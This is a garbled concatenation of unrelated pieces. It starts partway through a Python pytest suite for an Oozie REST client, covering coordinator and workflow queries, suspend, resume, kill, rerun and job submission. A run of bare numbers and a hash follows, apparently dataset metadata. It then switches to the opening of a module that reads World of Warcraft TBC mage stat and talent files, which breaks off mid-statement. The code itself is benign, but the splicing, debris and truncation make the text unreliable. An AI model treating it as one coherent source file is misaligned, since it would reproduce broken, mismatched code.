+ '?offset=12&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ACTION) mock_get.reset_mock() api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING') mock_get.reset_mock() api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.running()) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING;status=SUSPENDED') mock_get.reset_mock() with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, status=model.CoordinatorActionStatus.RUNNING) assert 'Cannot supply both coordinator action ID and status' in str(err) assert not mock_get.called def test_coordinator_query_limits(self, api): mock_result = { 'total': 100, 'coordJobId': SAMPLE_COORD_ID, 'actions': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, start=1) assert 'Cannot supply both coordinator action ID and start / limit' in str(err) with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ACTION, limit=10) assert 'Cannot supply both coordinator action ID and start / limit' in str(err) api._coordinator_query(SAMPLE_COORD_ID) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=100') api._coordinator_query(SAMPLE_COORD_ID, start=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=1') mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=91') api._coordinator_query(SAMPLE_COORD_ID, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?order=desc&offset=1&len=10') api._coordinator_query(SAMPLE_COORD_ID, start=10, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10') api._coordinator_query(SAMPLE_COORD_ID, start=99, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=99&len=10') api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING, start=10, limit=10) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10&filter=status=RUNNING') def test_coordinator_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._coordinator_query(SAMPLE_COORD_ID) assert "Coordinator '" + SAMPLE_COORD_ID + "' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_coordinator_action_query(self, api): mock_result = { 'id': SAMPLE_COORD_ACTION, } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result mock_coord = mock.Mock() mock_coord.actions = {} action = api._coordinator_action_query(SAMPLE_COORD_ID, 12, coordinator=mock_coord) mock_get.assert_called_with('job/' + SAMPLE_COORD_ACTION) assert action._parent == mock_coord def test_coordinator_action_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._coordinator_action_query(SAMPLE_COORD_ID, 12) assert "Coordinator action '" + SAMPLE_COORD_ID + "@12' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_decode_coord_id(self, api, sample_coordinator_running): with mock.patch.object(api, 'jobs_last_coordinator') as mock_last: mock_last.return_value = mock.Mock(coordJobId=SAMPLE_COORD_ID) with pytest.raises(ValueError) as err: api._decode_coord_id() assert 'Supply exactly one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, name='my_coordinator') assert 'Supply exactly one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, user='john_doe') assert 'User parameter not supported with coordinator_id' in str(err) result = api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID) assert result == SAMPLE_COORD_ID result = api._decode_coord_id(name='my_coordinator') assert result == SAMPLE_COORD_ID mock_last.assert_called_with(name='my_coordinator', user=None) result = api._decode_coord_id(name='my_coordinator', user='john_doe') assert result == SAMPLE_COORD_ID mock_last.assert_called_with(name='my_coordinator', user='john_doe') mock_last.return_value = None with pytest.raises(exceptions.OozieException) as err: api._decode_coord_id(name='my_coordinator') assert "Coordinator 'my_coordinator' not found" in str(err) result = api._decode_coord_id(coordinator=sample_coordinator_running) assert result == SAMPLE_COORD_ID with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, coordinator=sample_coordinator_running) assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(name='my_coordinator', coordinator=sample_coordinator_running) assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_coord_id(coordinator=sample_coordinator_running, user='john_doe') assert 'User parameter not supported with coordinator object' in str(err) def test_job_coordinator_info(self, api): with mock.patch.object(api, '_coordinator_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(name='my_coordinator', user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe') mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0) api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID, limit=10) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=10) def test_job_last_coordinator_info(self, api): with mock.patch.object(api, '_coordinator_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_last_coordinator_info(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) api.job_last_coordinator_info(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None) mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) api.job_last_coordinator_info(name='my_coordinator', user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe') mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1) def test_job_coordinator_action(self, api): with mock.patch.object(api, '_coordinator_action_query') as mock_query: with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_action(SAMPLE_COORD_ACTION) mock_decode.assert_called_with(SAMPLE_COORD_ACTION, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(SAMPLE_COORD_ID, action_number=12) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(name='my_coordinator', action_number=12) mock_decode.assert_called_with(None, 'my_coordinator', None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) api.job_coordinator_action(name='my_coordinator', user='john_doe', action_number=12) mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None) mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None) with pytest.raises(ValueError) as err: api.job_coordinator_action(SAMPLE_COORD_ACTION, action_number=12) assert 'Supply exactly one of coordinator_id or action_number' in str(err) with pytest.raises(ValueError) as err: api.job_coordinator_action(name='my_coordinator') assert 'No action_number supplied' in str(err) def test_job_coordinator_all_active_actions(self, api, sample_coordinator_running, sample_coordinator_action_running): with mock.patch.object(api, '_coordinator_query') as mock_query: mock_query.return_value = sample_coordinator_action_running.parent() with mock.patch.object(api, '_decode_coord_id') as mock_decode: mock_decode.return_value = SAMPLE_COORD_ID api.job_coordinator_all_active_actions(coordinator_id=SAMPLE_COORD_ID) mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) api.job_coordinator_all_active_actions(name='my_coordinator') mock_decode.assert_called_with(None, 'my_coordinator', None, None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) api.job_coordinator_all_active_actions(name='my_coordinator', user='john_doe') mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) sample_coordinator = copy.copy(sample_coordinator_running) sample_coordinator.actions = None api.job_coordinator_all_active_actions(coordinator=sample_coordinator) mock_decode.assert_called_with(None, None, None, sample_coordinator) mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active()) assert sample_coordinator.actions assert sample_coordinator.actions[12] == sample_coordinator_action_running class TestOozieClientJobWorkflowQuery(object): def test_workflow_query_parameters(self, api): mock_result = { 'total': 0, 'id': SAMPLE_WF_ID, 'actions': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result with pytest.raises(ValueError) as err: api._workflow_query('foo') assert 'Unrecognized job ID' in str(err) api._workflow_query(SAMPLE_WF_ID) mock_get.assert_called_with('job/' + SAMPLE_WF_ID) api._workflow_query(SAMPLE_WF_ACTION) mock_get.assert_called_with('job/' + SAMPLE_WF_ID) def test_workflow_query_exception(self, api): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing') with pytest.raises(exceptions.OozieException) as err: api._workflow_query(SAMPLE_WF_ID) assert "Workflow '" + SAMPLE_WF_ID + "' not found" in str(err) assert 'A bad thing' in str(err.value.caused_by) def test_decode_wf_id(self, api): with mock.patch.object(api, 'jobs_last_workflow') as mock_last: mock_last.return_value = mock.Mock(id=SAMPLE_WF_ID) with pytest.raises(ValueError) as err: api._decode_wf_id() assert 'Supply exactly one of workflow_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_wf_id(workflow_id=SAMPLE_WF_ID, name='my_workflow') assert 'Supply exactly one of workflow_id or name' in str(err) with pytest.raises(ValueError) as err: api._decode_wf_id(workflow_id=SAMPLE_WF_ID, user='john_doe') assert 'User parameter not supported with workflow_id' in str(err) result = api._decode_wf_id(workflow_id=SAMPLE_WF_ID) assert result == SAMPLE_WF_ID result = api._decode_wf_id(name='my_workflow') assert result == SAMPLE_WF_ID mock_last.assert_called_with(name='my_workflow', user=None) result = api._decode_wf_id(name='my_workflow', user='john_doe') assert result == SAMPLE_WF_ID mock_last.assert_called_with(name='my_workflow', user='john_doe') mock_last.return_value = None with pytest.raises(exceptions.OozieException) as err: api._decode_wf_id(name='my_workflow') assert "Workflow 'my_workflow' not found" in str(err) def test_job_workflow_info(self, api): with mock.patch.object(api, '_workflow_query') as mock_query: with mock.patch.object(api, '_decode_wf_id') as mock_decode: mock_decode.return_value = SAMPLE_WF_ID api.job_workflow_info(workflow_id=SAMPLE_WF_ID) mock_decode.assert_called_with(SAMPLE_WF_ID, None, None) mock_query.assert_called_with(SAMPLE_WF_ID) api.job_workflow_info(name='my_workflow') mock_decode.assert_called_with(None, 'my_workflow', None) mock_query.assert_called_with(SAMPLE_WF_ID) api.job_workflow_info(name='my_workflow', user='john_doe') mock_decode.assert_called_with(None, 'my_workflow', 'john_doe') mock_query.assert_called_with(SAMPLE_WF_ID) class TestOozieClientJobQuery(object): def test_job_info(self, api): with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info: with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info: api.job_info(SAMPLE_COORD_ID) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_info(SAMPLE_COORD_ACTION) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_info(SAMPLE_WF_ID) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert not mock_coord_info.called mock_workflow_info.reset_mock() api.job_info(SAMPLE_WF_ACTION) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION) assert not mock_coord_info.called mock_workflow_info.reset_mock() with pytest.raises(exceptions.OozieException) as err: api.job_info("wat?") assert "'wat?' does not match any known job" in str(err) assert not mock_coord_info.called assert not mock_workflow_info.called def test_job_action_info(self, api): with mock.patch.object(api, 'job_coordinator_info') as mock_coord_info: with mock.patch.object(api, 'job_workflow_info') as mock_workflow_info: api.job_action_info(SAMPLE_COORD_ID) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert not mock_coord_info.action.called assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_action_info(SAMPLE_COORD_ACTION) mock_coord_info.assert_called_with(coordinator_id=SAMPLE_COORD_ACTION) mock_coord_info().action.assert_called_with(12) assert not mock_workflow_info.called mock_coord_info.reset_mock() api.job_action_info(SAMPLE_WF_ID) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert not mock_workflow_info.action.called assert not mock_coord_info.called mock_workflow_info.reset_mock() api.job_action_info(SAMPLE_WF_ACTION) mock_workflow_info.assert_called_with(workflow_id=SAMPLE_WF_ACTION) mock_workflow_info().action.assert_called_with('foo') assert not mock_coord_info.called mock_workflow_info.reset_mock() with pytest.raises(exceptions.OozieException) as err: api.job_action_info("wat?") assert "'wat?' does not match any known job" in str(err) assert not mock_coord_info.called assert not mock_workflow_info.called class TestOozieClientJobCoordinatorManage(object): def test_fetch_coordinator_or_action(self, api, sample_coordinator_running, sample_coordinator_action_running): with mock.patch.object(api, '_decode_coord_id') as mock_decode: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_decode.return_value = SAMPLE_COORD_ID mock_info.return_value = sample_coordinator_running result = api._fetch_coordinator_or_action(SAMPLE_COORD_ID) assert result == sample_coordinator_running assert mock_decode.called assert mock_info.called with mock.patch.object(api, '_decode_coord_id') as mock_decode: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_decode.return_value = SAMPLE_COORD_ACTION mock_info.return_value = sample_coordinator_action_running.coordinator() result = api._fetch_coordinator_or_action(SAMPLE_COORD_ACTION) assert result == sample_coordinator_action_running assert mock_decode.called assert mock_info.called def test_job_coordinator_suspend_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running assert api.job_coordinator_suspend(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_coordinator_suspended assert not api.job_coordinator_suspend(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_suspend_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_running assert api.job_coordinator_suspend(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=suspend&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_suspended assert not api.job_coordinator_suspend(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_resume_coordinator(self, api, sample_coordinator_running, sample_coordinator_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_suspended assert api.job_coordinator_resume(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_coordinator_running assert not api.job_coordinator_resume(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_resume_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_suspended assert api.job_coordinator_resume(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=resume&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_running assert not api.job_coordinator_resume(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_kill_coordinator(self, api, sample_coordinator_running, sample_coordinator_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running assert api.job_coordinator_kill(SAMPLE_COORD_ID) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill') mock_put.reset_mock() mock_info.return_value = sample_coordinator_killed assert not api.job_coordinator_kill(SAMPLE_COORD_ID) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_kill_coordinator_action(self, api, sample_coordinator_action_running, sample_coordinator_action_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_running assert api.job_coordinator_kill(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=kill&type=action&scope=12') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_killed assert not api.job_coordinator_kill(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_rerun(self, api, sample_coordinator_action_running, sample_coordinator_action_killed, sample_coordinator_action_killed_with_killed_coordinator): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_action_killed assert api.job_coordinator_rerun(SAMPLE_COORD_ACTION) mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + '?action=coord-rerun&type=action&scope=12&refresh=true') mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_killed_with_killed_coordinator assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() mock_info.return_value = sample_coordinator_action_running assert not api.job_coordinator_rerun(SAMPLE_COORD_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_coordinator_rerun_only_supports_actions(self, api, sample_coordinator_running): with mock.patch.object(api, 'job_action_info') as mock_info: mock_info.return_value = sample_coordinator_running with pytest.raises(ValueError) as value_error: api.job_coordinator_rerun(SAMPLE_COORD_ID) assert str(value_error.value) == 'Rerun only supports coordinator action IDs' def test_job_coordinator_update(self, api, sample_coordinator_running, sample_coordinator_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_put.return_value = {'update': {'diff': "****Empty Diff****"}} coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-minimal') conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-minimal') mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_put.reset_mock() mock_info.reset_mock() mock_info.return_value = sample_coordinator_running mock_put.return_value = {'update': {'diff': "*****Diffs*****"}} coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-full') mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_put.reset_mock() mock_info.reset_mock() mock_info.return_value = sample_coordinator_killed with pytest.raises(exceptions.OozieException) as err: api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') assert 'coordinator status must be active in order to update' in str(err) mock_info.return_value = sample_coordinator_running mock_put.return_value = {} with pytest.raises(exceptions.OozieException) as err: api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') assert 'update coordinator' in str(err) class TestOozieClientJobWorkflowManage(object): def test_job_workflow_suspend_workflow(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running assert api.job_workflow_suspend(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_workflow_suspended assert not api.job_workflow_suspend(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_suspend_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running assert api.job_workflow_suspend(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_workflow_suspended assert not api.job_workflow_suspend(SAMPLE_WF_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_resume_workflow(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_suspended assert api.job_workflow_resume(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_resume(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_resume_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_suspended assert api.job_workflow_resume(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_resume(SAMPLE_WF_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_start_workflow(self, api, sample_workflow_running, sample_workflow_prep): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_prep assert api.job_workflow_start(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_start(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_start_workflow_action(self, api, sample_workflow_running, sample_workflow_prep): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_prep assert api.job_workflow_start(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_start(SAMPLE_WF_ACTION) assert not mock_put.called mock_put.reset_mock() class TestOozieClientJobSubmit(object): def test_jobs_submit_coordinator(self, api, sample_coordinator_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_post.return_value = None with pytest.raises(exceptions.OozieException) as err: api.jobs_submit_coordinator('/dummy/coord-path') assert 'Operation failed: submit coordinator' in str(err) mock_post.assert_called_with('jobs', mock.ANY) mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_COORD_ID} coord = api.jobs_submit_coordinator('/dummy/coord-path') mock_post.assert_called_with('jobs', mock.ANY) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_post.reset_mock() def test_jobs_submit_coordinator_config(self, api, sample_coordinator_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_post.return_value = {'id': SAMPLE_COORD_ID} api.jobs_submit_coordinator('/dummy/coord-path') conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>oozie.coord.application.path</name><value>/dummy/coord-path</value>' in conf assert '<name>user.name</name><value>oozie</value>' in conf mock_post.reset_mock() api.jobs_submit_coordinator('/dummy/coord-path', configuration={'test.prop': 'this is a test'}) conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>test.prop</name><value>this is a test</value>' in conf mock_post.reset_mock() def test_jobs_submit_workflow(self, api, sample_workflow_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running mock_post.return_value = None with pytest.raises(exceptions.OozieException) as err: api.jobs_submit_workflow('/dummy/wf-path') assert 'Operation failed: submit workflow' in str(err) mock_post.assert_called_with('jobs', mock.ANY) mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_WF_ID} wf = api.jobs_submit_workflow('/dummy/wf-path', start=True) mock_post.assert_called_with('jobs?action=start', mock.ANY) assert wf is sample_workflow_running mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_WF_ID} wf = api.jobs_submit_workflow('/dummy/wf-path') mock_post.assert_called_with('jobs', mock.ANY) mock_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert wf is sample_workflow_running mock_post.reset_mock() def test_jobs_submit_workflow_config(self, api, sample_workflow_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running mock_post.return_value = {'id': SAMPLE_WF_ID} api.jobs_submit_workflow('/dummy/wf-path') conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>oozie.wf.application.path</name><value>/dummy/wf-path</value>' in conf assert '<name>user.name</name><value>oozie</value>' in conf mock_post.reset_mock() api.jobs_submit_workflow('/dummy/wf-path', configuration={'test.prop': 'this is a test'}) conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>test.prop</name><value>this is a test</value>' in conf mock_post.reset_mock()
47.045678
118
0.647776
7,990
66,946
5.087484
0.039049
0.036532
0.049989
0.040665
0.883564
0.850943
0.823292
0.793599
0.759428
0.713769
0
0.010078
0.257401
66,946
1,422
119
47.078762
0.807579
0.002838
0
0.522847
0
0.002636
0.136311
0.041527
0
0
0
0.000703
0.255712
1
0.073814
false
0.007909
0.008787
0.000879
0.102812
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bdb903aa24f6b049c642dc46fbe0678bd7b992ac
35,706
py
Python
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
import fns import numpy as np import sys def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) from .libs import tbc_mage_backend as bck import importlib importlib.reload(bck) def read_stat_file(location, file, stats): loc = '/'.join(location.split('/')[:-1])+'/'+file with open(loc) as f: #print('stats for '+location+': '+loc) for line in f: if '#' in line: line = line.split('#')[0] sp = line.split() if len(sp)>1: if not sp[0][0] == '#': if sp[0] == 'intellect': stats['intellect'] = float(sp[1].strip()) if sp[0] == 'spirit': stats['spirit'] = float(sp[1].strip()) if sp[0] == 'common_spell_damage': stats['common_spell_damage'] = float(sp[1].strip()) if sp[0] == 'crit_rating': stats['crit_rating'] = float(sp[1].strip()) if sp[0] == 'hit_rating': stats['hit_rating'] = float(sp[1].strip()) if sp[0] == 'mp5': stats['mp5'] = float(sp[1].strip()) if sp[0] == 'fire_damage': stats['fire_damage'] = float(sp[1].strip()) if sp[0] == 'frost_damage': stats['frost_damage'] = float(sp[1].strip()) if sp[0] == 'arcane_damage': stats['arcane_damage'] = float(sp[1].strip()) if sp[0] == 'haste_rating': stats['haste_rating'] = float(sp[1].strip()) class mage_file: def __init__(self,location): self.location= location self.label = 'no label' self.stats = {} self.talents = bck.make_talents() self.burn_rot = [] self.save_rot = [] with open(location) as f: for line in f: if '#' in line: line = line.split('#')[0] sp = line.split() if len(sp)>1: if not sp[0][0] == '#': if sp[0] == 'stats_file': read_stat_file(location, sp[1], self.stats) if sp[0] == 'intellect': self.stats['intellect'] = float(sp[1].strip()) if sp[0] == 'spirit': self.stats['spirit'] = float(sp[1].strip()) if sp[0] == 'common_spell_damage': self.stats['common_spell_damage'] = float(sp[1].strip()) if sp[0] == 'crit_rating': self.stats['crit_rating'] = float(sp[1].strip()) if sp[0] == 'hit_rating': self.stats['hit_rating'] = float(sp[1].strip()) if sp[0] == 'mp5': self.stats['mp5'] = float(sp[1].strip()) if sp[0] == 'fire_damage': self.stats['fire_damage'] = float(sp[1].strip()) if sp[0] == 'frost_damage': self.stats['frost_damage'] = float(sp[1].strip()) if sp[0] == 'arcane_damage': self.stats['arcane_damage'] = float(sp[1].strip()) if sp[0] == 'haste_rating': self.stats['haste_rating'] = float(sp[1].strip()) for talent in self.talents: if sp[0] == talent: self.talents[talent] = int(sp[1].strip()) if sp[0] == 'burn_rotation:': for i in range(1,len(sp)): self.burn_rot.append(sp[i]) if sp[0] == 'save_rotation:': for i in range(1,len(sp)): self.save_rot.append(sp[i]) if sp[0] == 